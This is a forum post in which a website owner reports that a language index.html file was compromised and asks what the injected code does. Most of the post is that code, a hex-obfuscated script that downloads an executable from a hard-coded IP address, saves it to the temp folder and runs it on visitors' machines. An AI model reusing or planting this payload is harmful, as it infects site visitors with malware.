Topic: 1.2.16 hacked...
I have 1.2.16 installed.
My lang/language/index.html file is infected with something like this:
<Script Language='Javascript'>
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%56%42%53%63%72%69%70%74%22%3E%0D%0A%0D%0A%20%20%20%20%6F%6E%20%65%72%72%6F%72%20%72%65%73%75%6D%65%20%6E%65%78%74%0D%0A%0D%0A%20%20%20%20%6D%6D%6D%6D%64%66%20%3D%20%22%68%74%74%70%3A%2F%2F%32%30%30%2E%31%38%39%2E%31%37%39%2E%36%30%2F%49%45%78%70%6C%6F%72%65%72%2E%65%78%65%22%0D%0A%0D%0A%20%20%20%20%7A%30%3D%22%6F%62%6A%22%0D%0A%20%20%20%20%7A%31%3D%22%65%63%74%22%0D%0A%20%20%20%20%7A%73%74%72%3D%7A%30%26%7A%31%0D%0A%0D%0A%20%20%20%20%73%30%3D%22%63%6C%61%73%22%0D%0A%20%20%20%20%73%31%3D%22%73%69%64%22%0D%0A%20%20%20%20%73%73%74%72%3D%73%30%2B%73%31%0D%0A%0D%0A%20%20%20%20%72%30%3D%22%4D%69%63%72%6F%22%0D%0A%20%20%20%20%72%31%3D%22%73%6F%66%74%2E%22%0D%0A%20%20%20%20%72%32%3D%22%58%4D%4C%22%0D%0A%20%20%20%20%72%33%3D%22%48%54%54%50%22%0D%0A%20%20%20%20%72%72%73%74%72%3D%72%30%26%72%31%26%72%32%26%72%33%0D%0A%0D%0A%20%20%20%20%74%30%3D%22%63%6C%73%69%64%3A%42%44%39%36%43%35%35%36%2D%36%35%41%33%2D%22%0D%0A%20%20%20%20%74%31%3D%22%31%31%44%30%2D%39%38%33%41%2D%30%30%43%30%34%46%43%32%39%45%33%36%22%0D%0A%20%20%20%20%74%73%73%74%72%3D%74%30%26%74%31%0D%0A%0D%0A%20%20%20%20%53%65%74%20%73%64%64%64%77%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%7A%73%74%72%29%0D%0A%20%20%20%20%73%64%64%64%77%2E%73%65%74%41%74%74%72%69%62%75%74%65%20%73%73%74%72%2C%20%74%73%73%74%72%0D%0A%20%20%20%20%73%74%72%3D%72%72%73%74%72%0D%0A%20%20%20%20%53%65%74%20%65%64%64%20%3D%20%73%64%64%64%77%2E%43%72%65%61%74%65%4F%62%6A%65%63%74%28%73%74%72%2C%22%22%29%0D%0A%0D%0A%20%20%20%20%62%61%31%3D%22%41%64%6F%22%0D%0A%20%20%20%20%62%61%32%3D%22%64%62%2E%22%0D%0A%20%20%20%20%62%61%33%3D%22%53%74%72%22%0D%0A%20%20%20%20%62%61%34%3D%22%65%61%6D%22%0D%0A%20%20%20%20%73%74%72%33%33%3D%62%61%31%26%62%61%32%26%62%61%33%26%62%61%34%0D%0A%20%20%20%20%73%74%72%61%61%3D%73%74%72%33%33%0D%0A%20%20%20%20%73%65%74%20%63%63%63%63%20%3D%20%73%64%64%64%77%2E%63%72%65%61%74%65%6F%62%6A%65%63%74%28%73%74%72%61%61%2C%22%22%29%0D%0A%20%20%20%20%63%63%63%63%2E%74%79%70%65%20%3D%20%31%0D%0A%0D%0A%20%20%20%20%73%74%72%36%3D%22%47%45%54%22%0D%0A%20%20%20%20%65%64%64%2E%4F%70%65%6E%20%73%74%72%36%2C%20%6D%6D%6D%6D%64%66%2C%20%46%61%6C%73%65%0D%0A%20%20%20%20%65%64%64%2E%53%65%6E%64%0D%0A%0D%0A%20%20%20%20%66%72%30%3D%22%53%63%72%69%70%74%69%22%0D%0A%20%20%20%20%66%72%31%3D%22%6E%67%2E%46%69%6C%65%53%79%22%0D%0A%20%20%20%20%66%72%32%3D%22%73%74%65%6D%4F%62%6A%65%63%74%22%0D%0A%20%20%20%20%66%72%73%74%72%3D%66%72%30%26%66%72%31%26%66%72%32%0D%0A%0D%0A%20%20%20%20%65%65%65%65%64%66%66%3D%22%49%45%78%70%6C%6F%72%65%72%2E%65%78%65%22%0D%0A%20%20%20%20%73%65%74%20%76%76%76%76%20%3D%20%73%64%64%64%77%2E%63%72%65%61%74%65%6F%62%6A%65%63%74%28%66%72%73%74%72%2C%22%22%29%0D%0A%20%20%20%20%73%65%74%20%74%6D%70%20%3D%20%76%76%76%76%2E%47%65%74%53%70%65%63%69%61%6C%46%6F%6C%64%65%72%28%32%29%20%0D%0A%20%20%20%20%65%65%65%65%64%66%66%3D%20%76%76%76%76%2E%42%75%69%6C%64%50%61%74%68%28%74%6D%70%2C%65%65%65%65%64%66%66%29%0D%0A%20%20%20%20%63%63%63%63%2E%6F%70%65%6E%0D%0A%0D%0A%20%20%20%20%63%63%63%63%2E%77%72%69%74%65%20%65%64%64%2E%72%65%73%70%6F%6E%73%65%42%6F%64%79%0D%0A%0D%0A%20%20%20%20%63%63%63%63%2E%73%61%76%65%74%6F%66%69%6C%65%20%65%65%65%65%64%66%66%2C%32%0D%0A%0D%0A%20%20%20%20%67%74%67%30%3D%22%53%68%65%6C%6C%2E%41%70%22%0D%0A%20%20%20%20%67%74%67%31%3D%22%70%6C%69%63%61%74%69%6F%6E%22%0D%0A%20%20%20%20%67%74%72%72%73%74%72%3D%67%74%67%30%26%67%74%67%31%0D%0A%0D%0A%20%20%20%20%63%63%63%63%2E%63%6C%6F%73%65%0D%0A%20%20%20%20%73%65%74%20%78%78%73%64%64%20%3D%20%73%64%64%64%77%2E%63%72%65%61%74%65%6F%62%6A%65%63%74%28%67%74%72%72%73%74%72%2C%22%22%29%0D%0A%20%20%20%20%78%78%73%64%64%2E%53%68%65%6C%6C%45%78%65%63%75%74%65%20%65%65%65%65%64%66%66%2C%22%22%2C%22%22%2C%22%6F%70%65%6E%22%2C%30%0D%0A%0D%0A%20%20%20%20%0D%0A%0D%0A%20%20%20%20%3C%2F%73%63%72%69%70%74%3E'));
</Script>
I know I should've upgraded to a new version, but, considering the harm done, my question is: is this flaw already corrected in the new versions?
If so, what harm could/did this code do?
Thanks.